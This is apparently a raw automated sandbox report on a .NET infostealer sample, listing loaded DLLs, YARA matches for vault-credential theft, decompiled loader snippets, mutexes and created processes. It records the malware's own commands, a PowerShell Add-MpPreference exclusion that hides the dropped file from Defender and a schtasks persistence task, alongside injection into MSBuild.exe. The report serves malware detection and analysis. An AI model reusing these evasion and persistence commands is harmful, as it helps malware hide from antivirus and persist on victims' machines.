Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jYRIGnZlROed.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, UyDMxsd3t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, 86A7K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, vztq.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, B80ITW1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, uQSn7t.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, bEoUgRL.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@20/11@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Mutant created: \Sessions\1\BaseNamedObjects\vClJnoFCDBholUZVdnmAEEyAlP
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File created: C:\Users\user\AppData\Local\Temp\tmp919E.tmp

Jump to behavior

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	ReversingLabs: Detection: 28%
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.9e0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs	.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs	.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs	.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119716A push esi; retf	0_2_0119716B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119719D push esi; retf	0_2_0119719F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197184 push esi; retf	0_2_01197185
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011971B2 push esi; retf	0_2_011971B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011971CC push esi; retf	0_2_011971CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011971F9 push esi; retf	0_2_011971FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011971E5 push esi; retf	0_2_011971E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197052 push edi; retf	0_2_01197053
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011970BA push edi; retf	0_2_011970BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011970A5 push edi; retf	0_2_011970A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011970D1 push edi; retf	0_2_011970D2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119731C push ebp; retf	0_2_0119731D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197330 push ebp; retf	0_2_01197331
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197349 push esp; retf	0_2_0119734B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011973BF push esp; retf	0_2_011973C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011973AA push esp; retf	0_2_011973AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011973D5 push esp; retf	0_2_011973D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197214 push esi; retf	0_2_01197215
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197244 push ebp; retf	0_2_01197246
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119729B push ebp; retf	0_2_0119729C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01199ABF push edx; iretd	0_2_01199ACE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011972B2 push ebp; retf	0_2_011972B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119750D push ebx; retf	0_2_01197513
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119753B push edx; retf	0_2_01197541
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197521 push ebx; retf	0_2_01197527
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197571 push edx; retf	0_2_01197572
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119759C push edx; retf	0_2_0119759D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_01197585 push edx; retf	0_2_01197586
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_011974B4 push ebx; retf	0_2_011974B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119775B push eax; retf	0_2_0119775C
